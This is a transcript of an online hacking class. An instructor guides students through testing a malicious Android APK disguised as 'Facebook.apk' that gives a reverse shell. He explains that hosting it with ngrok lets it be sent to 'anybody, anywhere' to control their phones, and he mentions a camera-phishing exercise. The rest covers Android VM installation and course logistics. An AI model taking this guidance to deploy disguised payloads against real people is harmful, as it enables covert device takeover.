Okay, you're still downloading. Okay, just a minute here. Sorry. So is that MG, right? Okay. Yeah, MG. So if you go to your how do you see what I need to do here, MG, on your mobile device, all right? Try to ping do something like this. Let me type it in the chat here. Can you hear me, MG?
Yes, I'm with you.
Okay, so let's do something like HTTP double slash IP address. When I say IP address, it means your IP address, then the port number, I think 444 slash APK name. So if you look at the chart here, that's the Zoom chart, I draw something like HTTP. The IP address means the IP address of your Kali, then that's colon the what do you call it, port number / the APK name. So now why we are doing this is because we've now sent this to the server. So for us to be able to download this, can you hear me? For us to be able to download it from the server, it's a local host server actually. So it's not like okay.
Okay, so I'm doing this on the Android device.
Try it on your Android device. It's supposed to work, but most times it's oh god, most times it's on the virtual machine. But try it on your Android device. It's supposed to give you the same thing if it's connected. If you're on the same network, it's supposed to work. Let me try this on mine also and see. So I didn't save mine to the server, did I? So
Oh.
and 2.168.1.74.
Oh.
This won't work. Okay, so there's only one issue here that's going to make it not to work on your phone. So it's because it's not hosted on a server, right? Because it's not hosted on a server. Now, if you install the Android, that's the Android on your virtual machine, all right, this is going to work. Now we've created the payload, all right. We've created the payload, and the payload is working fine. For you to have this started reverse TCP, what means it's working very fine. But the only reason why it's not going to work on your phone is because we've not sent this payload to the server. All right, we've not sent to the server, so now it's working on local host only. So that's why you'll see we are using L host and L ports. That's local host and local ports. Do you understand? That's the reason why this won't work on your mobile, unless maybe your mobile is on the same network with them. That's the NAT network and all that. Exactly. That's when it's going to work properly. But for now, it won't work. I doubt it's going to work on your host, that's your phone. So the only way we are going to make use of this now is to download the Android on our virtual machine. Do you understand? Downloading your Android on your virtual machine means they're going to be on the same NAT network.
Network.
So we can then download the APK file, and it's going to work because they're on the same network. Do you understand what I'm trying to say?
Yeah, I think I get what you mean.
Yeah, so this payload won't work directly on your phone now because it's not hosted on the server. So it's going to sit like a normal what do you call it? A normal application, all right? A normal application. There's no host to the server. It's not on the server at all. So even
Special one, please. So I have
Yeah.
a question. It's like I'm
Yes.
lost. What is payload? Because me, I cannot see any APK file here. The only thing I'm seeing is just the only thing I'm
Where-
seeing is just
Okay.
this thing, the IP address and the
payload is the APK that you created, is the APK file you created. So now let me explain how this thing works. So as a hacker, all right, you create malicious payloads, more like applications, all right. You send it to someone, they click on it, and you get a reverse connection, more like you get a connection to your own PC, your own machine, where you can use to control the person's device and all that. Now, we've successfully created this application, the Facebook.apk, all right. We've successfully created it, but now it is not hosted to the server, all right. We are doing a test run here, so it's not hosted to the server. If you install the Android, all right, if you install the Android on your virtual machine and they are on the same network, that's the NAT network, you automatically, once you send it to the Android and click on it, you get a connection because they're on the local machine. So the Facebook.apk that you created is the payload. Do you understand?
Okay. See, I'm expecting to see something like a link, but I'm not seeing any link. Is that fine? Because
No, you're not
I know.
supposed to get a link. Yeah, it's very fine. You're not supposed to get a link. What you created now is an application. The normal way you send app to people, you send Facebook app. All right, it's the same way you created an app here. But our app is not just an app. All right, it's a malicious app that gives us a reverse connection. When I say reverse connection, it gives us access to people's phone. So now, if we should go advance on this, our app that we just made here, we host it on a server. We can use ngrok or whatsoever, whichever server we want to. We can then send it to people, and once they click on it, we get a connection because it is hosted on the internet now. But now it is not hosted; it is on the local host, because you can see we are using local host. Our IP address, local ports, just a random port number. All right. So you won't, if you send it to your phone now, only if your phone is on the same what do you call it, network with them, with the other, your Kali and the rest, then it's going to work properly. Are you understanding? So the only way for this our payload to work is if you test it on a virtual machine.
Okay.
But if you want it now to work on your phone, we have to go advanced. You have to change that local ports and local what do you call it? The local ports and the local hosts. You have to change it. Once you change that, then you're going to get a connection. Now we can send it to anybody, anywhere. Do you understand? We can send it to anybody, anywhere.
Okay.
Because it's on the server now.
Okay.
Are you understanding?
Yes, yes.
Yeah, but we are not sending it to the server. So we are going to only test run it on the Android virtual machine to make sure it's working. So if you download the Android, all right, if you download the Android on your VM and you send it there, if it doesn't work, that's when we have an issue. If it doesn't work on your virtual machine, then we have an issue. But I'm very certain, 100% sure it's going to work there. Do you understand? But what we did today is just how to create this payload. If you want to modify it and use it for whatever you want to do, then you have to advance your payload that's hosting it on the server.
Okay, so can you let us know how to do that on a server? Is there anything like a big deal?
Sure. Oh, damn it. It's not a big deal, actually. It's not like a big deal. Why do you want to do this? That's the first question. Why do you want to do this?
It's for educational purpose. I just want to know because, like you're explaining now, the one we just created now is for the local host. So what if we want
Yes.
to do? What if we want to do the one that we can actually test in the real life? What
It's
is
still the same. It's still the same process. It's still the same process. The only thing you're going to change there is the local host and local ports. We can use servers like ngrok and Savio. So remember yesterday, yesterday when we did the Camfish test, all right, we were able to send it to ourselves and try it out, and it was working because it was on the server. All right, there was a link. It was a server there. We can also use this Camfish on a local host, and it'll give you a local host address. And even if I send this address to your phone, it won't work. But if you send it to maybe your machine, it will work properly. So the same thing we are doing here. We are not hosting. You can use ngrok to host what do you call it? You can use ngrok or Savio to do that.
Okay.
But like I said, it's more advanced. Rather, it's more advanced. But we can do it, but it's just advanced.
Okay. I will
Please,
let you know
the
if I try it.
question.
I will DM you if I try it.
No problem. You can drop it in the group also. Abby is here. Are you done installing? Let's try. I just want us to try it out before we end the installation.
No, I've not started. The download is still going. Still like 1 minute for the download.
1 minute,
Hello?
okay.
Yeah.
Yeah, I can hear you.
So
Download is
I'm still
taking
waiting for
like
the download.
forever. The
I
download
don't
is
know.
taking like forever.
Yeah, so maybe I think it's EFI. It's
See,
921
yeah,
MB. Yeah,
MB, almost 1 gig.
yeah.
Yeah.
But it means literature.
So
It is
while we
finished
are
now.
waiting, yeah. So while we are waiting, right? While we are waiting for this, remember today's today's our last day of what do you call it, the class, you know. So I would like to know your view on the class so far. I'd like to know your view, what should improve and all that. And also, I mean, for those that would, proceed, you can always speak to Ayo, speak to her directly. You can text her, but I would like to know maybe where you want us to improve and all that, your view generally on this.
Honestly, no capping at all here. This is the most interactive session I've ever had because I've been to several cybersecurity classes, but this is exceptional. No capping. So I'm definitely going to give you guys A+.
Thank you. Thank you so much. We try as much as possible to make it interactive with our students because me also, I've been in some paid classes and it sometimes it's very boring because you just mute your mic and you're listening. Like, oh, okay, that's it. Some of them, after you pay, they just send you loads of recording and all that. We could do that, but no, we can't. I mean, it won't just make sense because we've had our first cohort, so we could just say, oh, let's just forward the videos to them and let them, watch and learn. But no, we try to make it interactive and, I don't know, make it just interactive, that's basically our goal, make it interactive and not boring at all.
Well, thank you so much, special one. You are
No
no
worry.
special one as a fluke. Yeah. The name really speaks for you. I've been enjoying myself. Really. For a very long time that I've been watching Gnome for 8, and then no, I think it's because the class has been interacting. The only problem I have that I'm interested in the advance, but the timing now, I think maybe if there's going to be another one after these 2 months, I will be interested to join. But this one just because it's going to last with the Ramadan, and then that 8 and stuff, it won't be convenient. I'm very sure coming back from work, go to malls, all those things. So I'll be missing a lot of things. So
okay, I guess
another one is going to come on after this, then surely I need to advance on this. So
no
it's been
problem. You can speak to Miss Ayo. She can.
Ayo. So, I hope she's
Ayo, are you
here.
here? Hello, Ayo.
Hello.
I think she's in a class, but I don't know. Ayo, are you here?
She has been a good coordinator as well. So we
Okay,
appreciate it.
honestly, BES actually made a very valid point that I didn't even consider. Like Ramadan is coming and a lot of activity here and there, especially Taraweeh, very important. So is there a possibility that we like shift it to a later hours of the night instead of 8? Because by that 8, definitely I'm not Taraweeh. So can we make it around 10? to be considerate with others, shall
Yeah. So we okay now we chose firstly we chose what do you call it? We chose weekends because of our students said they wanted weekends. So we are always available, to teach. So whatsoever time is convenient by everybody, with everybody, we can make adjustments. And if we can't, we also let you know. So you can speak to Ayo. Ayo, I don't know why I think she's in a class. Ayo, are you here?
Okay, so you listen to what you said in the recording. Is the recording still on or is off now?
Yes, it's still on.
Okay,
I'm
so
guessing she's in the class. Yeah.
okay.
I
So
think I have my download fully now, so
please
start the
one
installation.
minute please, before we go on. So I wanted
Okay.
to ask that how do we get involved in tech community, other tech communities like meetings, tech expo, all these stuffs like that? Do you
Okay,
understand?
so yeah, I get. So we once you're done with this, all right, you may not even be done with this, but once you've gone to the advanced class, we'll add you to all our groups, and you see you meet other people. Like I said earlier, it's connection, just your contribution. You might think it's little, or you might think you're a nobody there, but one contribution will just make you known and all that. So we'll just add you to our groups. And also, you're on Twitter, right? Twitter and LinkedIn. So you can just, make some posts. Oh, I just said my cybersecurity journey and all that. And you'd see a lot of persons like we are coming into the cybersecurity family and all that. You know, that's just basically it. It's not like a big deal. And we also share links to events like Cyber Fest Africa, Google Developers Fest, all those events. Most of them are free, like they are just free. Just come and learn and eat food. There's always plenty of food in tech events. So you eat food, just hang out with people, make new connections and all that. So there's always a link and it's always shared for free. So that's just it, just advertise yourself out there and you'll meet people.
Okay.
That one is not even an issue at all. Yes, it is not an issue.
All right.
I'm still trying to text. So
Sorry, yeah, special one, please. Oh, hello, special one. Can you hear me?
yes, I can, please. Can you hear me?
Okay, so what I want to understand is, I believe the advanced class is like a 2 month. Yes, I can hear you. Can you hear me?
Yes, I can proceed.
Okay, so this part.
Proceed, please. I can hear you. His network is bad, I guess.
Okay, so I wanted to ask. I know the advanced. Yes, yes.
Is he having network issues?
So I'm trying to speak, but I don't think you can hear me very well. I
I
don't know if
can
you
hear
can
you
hear
very
me
well,
now.
please. I can hear you.
Okay, so what I want to understand is for the 2 months, that's for the advanced class, the 2 months, because according to the flyer, Miss Ayo dropped, it was stated that it's for 2 months. So is it like a weekend for 2 months, or what was the structure essentially?
Okay, so normally our classes are 3 times a week, all right? So now we are still using weekends because our last cohort, like I stated, all our students said they wanted weekend classes because most of them were working. I was like, oh, they'll be free on by the weekend. They are in Lagos, most of them. So they said they'll be free during the weekend. So we're like, okay, no worries. We'll work with that. That's why we shifted the class to weekends. But if you would want maybe an adjustment, if everyone wants an adjustment and be like, oh, you would prefer Monday, Wednesdays, and Fridays, We'll also make adjustment also to Monday, Wednesdays, and Fridays too. Depending on our students, whatever they want. But all we know is it's going to be 3 times in a week, as for that 2 months.
All right.
So when you
I
learn the
think the
first day,
weekend is
use the
fine.
next day to practice. Sorry?
I think the weekend is okay anyway. Yeah, the Friday, Saturday, Sunday, it's still fine.
Okay. Whichever one, it's still fine. Whichever one is still fine. My week, in fact, my Monday to Sunday is occupied like this. Monday to Sunday, I have a lot of students, both home and abroad, and
Uh,
everyone has picked
Hello,
their
social
days
one.
already. Yes, please.
So I've started running it. So can I share the
Is it working
screen?
properly
You can
now?
see. Yes, it's working now. Live
Oh,
CD.
nice.
That's where I am now. 100.
Okay. Okay, good. So what do you call it? Share your screen, please. Okay. Let me see. See what's live. Sorry. Let me follow up this one properly. Just 1 minute, please. Just a minute. Just 1 minute. So I forgot. Right, this. Just a minute. I'm here. Just give me a minute. Okay. What did you click on? Can you hear me, Abiz?
Click on anything. Just take me to this place.
Just click on the screen. Oh no.
Just came from, in fact, I look sideways and then I find myself here.
I was even looking also.
When you say, hold on, just look at them. So I cancel and start.
Okay, yeah.
Are you with me?
Yeah, I'm with you. Yeah, proceed.
So it said now, should I press?
Okay.
So it's counting
Okay.
seconds now. So
Okay, go down to advanced option. Use the arrow key and bring it down. Go to auto installation. Scroll down. Yes, that one. Yeah. Yes.
okay.
Hold on.
I see.
Hold on, I'm coming. So yeah, sorry, hold on. 1 minute. So click on go back to reboot. Go down to reboot. Can you hear me?
Yes, I've done that. Hello.
Yeah, I can hear. I'll just hold on with you. Did it okay, just hold on. Did it just load to this part and stopped? It's taking light again.
Just keep saying dictating Android. That's it.
Press the enter button. Android. How are you doing this? Why is always getting stuck at this point now? Okay. Hold on. I think you have to type something. It's not supposed to take this long.
Just keep dictating.
Oh, God, why is installation? This is becoming so hard.
But what I'm saying in the Android, by 86 is also supposed to be the 64. Since we pick all the 64 the last time. Is it the fashion? Since the system is
just
64,
86. That's the version. That's what it's supposed to do.
32-bit.
Press C and press enter. Let me see.
C.
Yeah. You just want C.
No.
Oh dear, this thing is gonna take my time. Oh God.
It's used to give this kind of error.
we I've been speaking since and my mic is being muted. So
Sorry.
I said, yeah, I dropped a link. I dropped a link in the
What's up?
WhatsApp group. Yeah. So you try to follow up. So I'm going to give an extra class tomorrow if you're free. Right, if you're free, I'm going to take an extra class just to round off this mobile hack. All right, just to round
Yeah.
off these mobile hacks.
I'll be available. Same time.
Okay. Whenever you're free, just let me know.
Voilà.
Yes. So this is all we're going to be doing for today. If you have any question regarding the class, you can always speak to Miss Ayo. She's having a class, that's why she's not really here.
No problem. I'll go over it again and then any
Yes.
issue. I'll
Even if you
discuss
can
with
fix it this night, also you can also let me know. If you can fix it this night, you let me know.
No, I will try.
No problem, Z. Have a good night, Z. Also try to do the installation, Z, and then get back to me also.
Okay.
Yes. So other persons in the group. Okay. Quentin. That's Quentin. That's your name. Have a good night, everybody. All right.
Thank
Yeah,
you.
we'll speak tomorrow. So if I'm having a class tomorrow, I'll drop the link for the
Okay.
final class. Yeah.
Okay. All right. Thank you so
Thank
much
you.
for it.
Thanks so much.
No problem. Thank you. Sure.